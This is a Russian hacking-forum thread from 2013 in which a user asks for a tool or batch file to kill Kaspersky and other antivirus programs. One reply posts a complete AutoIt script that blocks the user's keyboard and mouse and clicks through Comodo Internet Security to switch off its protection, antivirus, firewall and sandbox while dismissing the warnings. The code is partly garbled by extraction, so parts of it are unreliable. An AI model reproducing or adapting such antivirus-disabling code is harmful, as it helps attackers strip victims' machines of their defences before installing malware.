ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   ANTIKaspersky NOSicurity lab (https://forum.antichat.xyz/showthread.php?t=8066516)

528528lololo 28.11.2013 01:00
Доброго времени суток! Пишу батник который должен убивать касперского и прочую ересь,
вопросы состоят в следующем:
Если у кого-то есть приложение которое убивает антивирусы не будте жадинами поделитесь
Есть ли у кого-нибудь способ жестого убийства MD процессов?
Можно ли убивать все антивирусы простым bat действием от имени админа del Kav.exe ? (Kav.exe - это файл касперского) и если да то напишите все главные файлы каспера и др. ереси
в конце работы batnik выложу в паблик

BlackH 28.11.2013 01:00
Это уже даже не смешно.

Pronorp 28.11.2013 01:00
Цитата:

Сообщение от 528528lololo

Доброго времени суток! Пишу батник который должен убивать касперского и прочую ересь,
вопросы состоят в следующем:
Если у кого-то есть приложение которое убивает антивирусы не будте жадинами поделитесь
Есть ли у кого-нибудь способ жестого убийства MD процессов?
Можно ли убивать все антивирусы простым bat действием от имени админа del Kav.exe ? (Kav.exe - это файл касперского) и если да то напишите все главные файлы каспера и др. ереси
в конце работы batnik выложу в паблик

Уважаемый 528528lololo,очевидно эти числа в начале Вашего ника,обозначают три буквы - ШКО?

528528lololo 29.11.2013 01:00
Цитата:

Сообщение от Pronorp

Уважаемый 528528lololo,очевидно эти числа в начале Вашего ника,обозначают три буквы - ШКО?

ты чё? халявные плюсы захотел?
может что то на счёт вопроса скажешь?

Pronorp 29.11.2013 01:00
Вот,например,программка отключающая защиту Comodo IS.Язык Autolt v.3.Проверено на 7(х86) и 8 (х64).Источник,правда уже не доступен.А "плюсы",мне в ... не впирались.Видео по использованию. [►]

Код программы

C# highlight

Код:
#cs ----------------------------------------------------------------------------
AutoIt Version:
3.3
.8
.1
Author:                Ryder95
 
Script Function:
Отключает всю систему защиту Comodo Internet Security Premium
#ce ----------------------------------------------------------------------------
; Script Start - Add your code below here
Global $msg[
4
];Переменная для информации об окне оповещения
Break(
0
);Попытка отключения возможности отключения скрипта пользователем
If @OSVersion=
"WIN_7"
then $WarnName=
""
;Имя окна оповещения
If @OSVersion=
"WIN_8"
then $WarnName=
"COMODO Оповещение об отключении компонента"
;Имя окна оповещения
BlockInput(
1
) ;Попытка отключить устройства ввода пользователя
Select ;Запуск
Comodo
  Case not WinExists("COMODO Internet Security Premium ")
;Если программа не запущена...
  Run(@ProgramFilesDir &
"\COMODO\COMODO Internet Security\cistray.exe --shortcut"
);...то запуск программы
  AutoItSetOption(
"WinTitleMatchMode"
,
3
);Настройки поиска главного окна
  WinWaitActive(
"COMODO Internet Security Premium "
,
""
,
10
);Ждём, когда активируется
Case not WinActive("COMODO Internet Security Premium ")
;Если не активна...
  WinActivate(
"COMODO Internet Security Premium "
);...то активируем главное окно
EndSelect
$main=WinGetPos(
"COMODO Internet Security Premium "
) ;Получение позиций главного окна
sleep(
500
) ;Пауза (дать компьютеру успеть выполнить действие на экране)
MouseClick(
"left"
,$main[
0
]+Round($main[
2
]*
0.8844
),$main[
1
]+Round($main[
3
]*
0.2948
),
1
,
100
) ;Отключение защиты
sleep(
5000
) ;Пауза
MouseClick(
"left"
,$main[
0
]+Round($main[
2
]*
0.8983
),$main[
1
]+Round($main[
3
]*
0.3137
),
1
,
100
) ;Отключение антивируса
OffWarn();вызов функции, работающей с окном оповещения
WinActivate(
"COMODO Internet Security Premium "
);Активируем окно
Comodo
sleep(500)
;Пауза
MouseClick(
"left"
,$main[
0
]+Round($main[
2
]*
0.8983
),$main[
1
]+round($main[
3
]*
0.4008
),
1
,
100
) ;Отключение фаервола
OffWarn()
WinActivate(
"COMODO Internet Security Premium "
) ;Активируем окно
Comodo
sleep(500)
;Пауза
MouseClick(
"left"
,$main[
0
]+Round($main[
2
]*
0.8983
),$main[
1
]+round($main[
3
]*
0.4877
),
1
,
100
) ;Отключение Авто-
Sandbox
OffWarn()
WinActivate("COMODO Internet Security Premium ")
;Активируем окно
Comodo
sleep(500)
;Пауза
WinClose(
"COMODO Internet Security Premium "
);закрываем главное окно
Func OffWarn()
;функция, работающая с окном оповещения
  $s=WinWait($WarnName,
""
,
5
);Ждём появления оповещения
if
@OSVersion=
"WIN_8"
and
$s=
0
then Return
  WinActivate($WarnName)
  Select
  Case @OSVersion
=
"WIN_8"
$msg=WinGetPos($WarnName) ;Получаем координаты окна оповещения
  Case @OSVersion=
"WIN_7"
$msg[
0
]=@DesktopWidth
-462
$msg[
1
]=@DesktopHeight-round(@DesktopHeight*
0.0666
)
-289
$msg[
2
]=
462
$msg[
3
]=
289
EndSelect
if
$msg[
0
]+$msg[
2
]=round($msg[
3
]*
0.044
) Then ;Если меню снизу
if
($msg[
0
]>=
0
)
and
($msg[
0
]+$msg[
2
]@DesktopWidth
then MouseClick("left",@DesktopWidth-Round($msg[2]*0.8225),$msg[1]+Round($msg[3]*1,006),1,100)
;если окно за правой границей
Else
  if ($msg[0]>=0) and ($msg[0]+$msg[2]@DesktopWidth
then MouseClick("left",@DesktopWidth-Round($msg[2]*0.8225),$msg[1]+Round($msg[3]*0.6366),1,100)
;если окно за правой границей
EndIf
  sleep(500)
;Пауза
  MouseClick(
"left"
,$msg[
0
]+round($msg[
2
]*
0.6082
),$msg[
1
]+round($msg[
3
]*
0.9377
),
1
,
100
)
EndFunc

Wcfs 29.11.2013 01:00
Цитата:

Сообщение от 528528lololo

ты чё? халявные плюсы захотел?
может что то на счёт вопроса скажешь?

Тема бред, какой ответ ты хочешь?


Время: 17:06